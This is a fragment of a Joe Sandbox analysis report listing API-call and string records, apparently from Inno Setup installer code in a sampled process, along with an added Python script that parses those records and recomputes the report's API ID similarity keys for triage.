• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                            • API String ID: 2704155762-2318956294
                                                                                                                            • Opcode ID: 758a1f69d520b8918bf42382d246255108ca9a9b4ea86f87ae1ee207ed763a49
                                                                                                                            • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                                                            • Opcode Fuzzy Hash: 758a1f69d520b8918bf42382d246255108ca9a9b4ea86f87ae1ee207ed763a49
                                                                                                                            • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

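The "API ID" line under each record's Similarity heading is the key the report uses to match functions across samples: it is built only from the API names in the record's "APIs" list, including the "Part of subcall function" lines. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin. It parses the "APIs" lines of a record exactly as they appear in this section (call name, module, argument list, call-site address, optional subcall address) and rebuilds the API ID. The rule it implements, CamelCase tokens counted, grouped by descending frequency with "$" between groups and sorted alphabetically within a group, and the stop-word list (Get/Set/Add/Rtl/Reg prefixes, Ex/A suffixes, Key/Id/Of/End/For, the acronyms DC/DI/SH) are inferred from the six records in this section and are assumptions; the "W" entry is not observed here and is assumed by analogy with the "A" suffix. The numeric "API String ID" hash is not reproduced. The two embedded samples are copied from the records above. Recomputing these keys is useful when triaging a report like this one, because the strings the same records carry (Inno-Setup-RegSvr-Mutex, "Deleting Uninstall data files.", the Fonts registry key messages) are consistent with Inno Setup installer runtime code in process 15 rather than payload logic, and a function with a known API ID can be filtered out on sight in later reports.

```python
"""Parse Joe Sandbox 'APIs' lines and rebuild the record's 'API ID' similarity key."""
import re
from collections import Counter

# One call line from the report, e.g.
#   • GetDC.USER32(?), ref: 0041BA23
#   • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?), ref: 00450933
# 'ref' is the call-site address; 'sub' is set when the call sits in a callee.
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)

# Split CamelCase API names into words: 'CreateDIBitmap' -> Create, DI, Bitmap
WORD_RE = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+")

# Tokens dropped before counting. Inferred from the six records in this section
# (assumption); 'W' is not observed here and is assumed by analogy with 'A'.
STOP_WORDS = frozenset({"Get", "Set", "Add", "Rtl", "Reg", "Key", "Ex", "A", "W",
                        "Id", "Of", "End", "For", "DC", "DI", "SH"})


def parse_calls(text):
    """Return one dict (api, mod, args, ref, sub) per call line; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue  # 'APIs', 'Strings' and string xref lines do not match
        d = m.groupdict()
        d["args"] = [a for a in (d["args"] or "").split(",") if a]
        calls.append(d)
    return calls


def api_tokens(name):
    """CamelCase words of an API name with the stop words removed."""
    return [w for w in WORD_RE.findall(name) if w not in STOP_WORDS]


def api_id(calls):
    """Tokens grouped by descending count, '$' between groups, alphabetical inside."""
    counts = Counter(t for c in calls for t in api_tokens(c["api"]))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


# Samples copied from the 'APIs' lists of two records in this section.
SAMPLE_PALETTE = """\
• GetFocus.USER32 ref: 0041BA17
• GetDC.USER32(?), ref: 0041BA23
• SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
• RealizePalette.GDI32(00000000), ref: 0041BA69
• CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
"""

SAMPLE_UNINSTALL = """\
APIs
  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
• OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
• SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
• CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
• Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
Strings
• Deleting Uninstall data files., xrefs: 004964FB
"""

if __name__ == "__main__":
    for name, text in (("palette", SAMPLE_PALETTE), ("uninstall", SAMPLE_UNINSTALL)):
        calls = parse_calls(text)
        print(f"{name}: {len(calls)} calls, API ID = {api_id(calls)}")
```

Both samples reproduce the API ID printed in their records. Feed the function a record whose API ID you already know and the result should match character for character; when it does not, the difference is almost always a token that belongs in the stop-word list, which is the part of the rule this example had to infer.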
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                                            • LocalFree.KERNEL32(0065E268,00000000,00401B68), ref: 00401ACF
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0065E268,00000000,00401B68), ref: 00401AEE
                                                                                                                            • LocalFree.KERNEL32(0065F268,?,00000000,00008000,0065E268,00000000,00401B68), ref: 00401B2D
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                            • String ID: he
                                                                                                                            • API String ID: 3782394904-1137534704
                                                                                                                            • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                            • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                            • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                            • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
  • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
Strings
• Failed to strip read-only attribute., xrefs: 00459EA0
• Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
• Deleting directory: %s, xrefs: 00459E5B
• Stripped read-only attribute., xrefs: 00459E94
• Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
• Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
• Failed to delete directory (%d)., xrefs: 00459F68
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CloseErrorFindLast
• String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
• API String ID: 754982922-1448842058
• Opcode ID: a90d6a71378203c935e082798c834a37bf98dfb32ab31270fca932f3b1ee089a
• Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
• Opcode Fuzzy Hash: a90d6a71378203c935e082798c834a37bf98dfb32ab31270fca932f3b1ee089a
• Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCapture.USER32 ref: 00422EA4
• GetCapture.USER32 ref: 00422EB3
• SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
• ReleaseCapture.USER32 ref: 00422EBE
• GetActiveWindow.USER32 ref: 00422ECD
• SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
• SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
• GetActiveWindow.USER32 ref: 00422FBF
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: CaptureMessageSend$ActiveWindow$Release
• String ID:
• API String ID: 862346643-0
• Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
• Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
• Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
• Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
• GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
• GetActiveWindow.USER32 ref: 0042F2DA
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
• SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Window$ActiveLong$Message
• String ID:
• API String ID: 2785966331-0
• Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
• Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
• Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
• Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0042948A
• GetTextMetricsA.GDI32(00000000), ref: 00429493
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 004294A2
• GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
• SelectObject.GDI32(00000000,00000000), ref: 004294B6
• ReleaseDC.USER32(00000000,00000000), ref: 004294BE
• GetSystemMetrics.USER32(00000006), ref: 004294E3
• GetSystemMetrics.USER32(00000006), ref: 004294FD
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
• String ID:
• API String ID: 1583807278-0
• Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
• Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
• Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
• Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 0041DE27
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
• ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
• MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
• GetStockObject.GDI32(00000007), ref: 0041DE5B
• GetStockObject.GDI32(00000005), ref: 0041DE67
• GetStockObject.GDI32(0000000D), ref: 0041DE73
• LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ObjectStock$CapsDeviceIconLoadRelease
• String ID:
• API String ID: 225703358-0
• Opcode ID: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
• Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
• Opcode Fuzzy Hash: cf3de45f10179e040e4bf754cd3e00afbbff0486b0448c288d4be5e1939ebdb6
• Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadCursorA.USER32(00000000,00007F02), ref: 00463344
• SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
• SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Cursor$Load
• String ID: $ $Internal error: Item already expanding
• API String ID: 1675784387-1948079669
• Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
• Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
• Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
• Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
Uniqueness

Uniqueness Score: -1.00%

APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
• API String ID: 390214022-3304407042
• Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
• Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
• Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
• Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
• SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
• GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: ClassInfoLongMessageSendWindow
• String ID: COMBOBOX$Inno Setup: Language
• API String ID: 3391662889-4234151509
• Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
• Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
  • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
• Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
• InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
  • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
• InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
  • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
• InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Menu$Insert$Create$ItemPopupVersion
• String ID: ,$?
• API String ID: 2359071979-2308483597
• Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
• Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
• Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
• Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
• DeleteObject.GDI32(?), ref: 0041BF9F
• DeleteObject.GDI32(?), ref: 0041BFA8
• CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Object$BitmapBitsDelete$CreateIcon
• String ID:
• API String ID: 1030595962-0
• Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
• Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
• Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
• Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
• GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
• SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
• RealizePalette.GDI32(?), ref: 0041CF92
• StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
• StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
• SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
• String ID:
• API String ID: 2222416421-0
• Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
• Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
• Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
• Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SendMessageA.USER32(00000000,?,?), ref: 0045732E
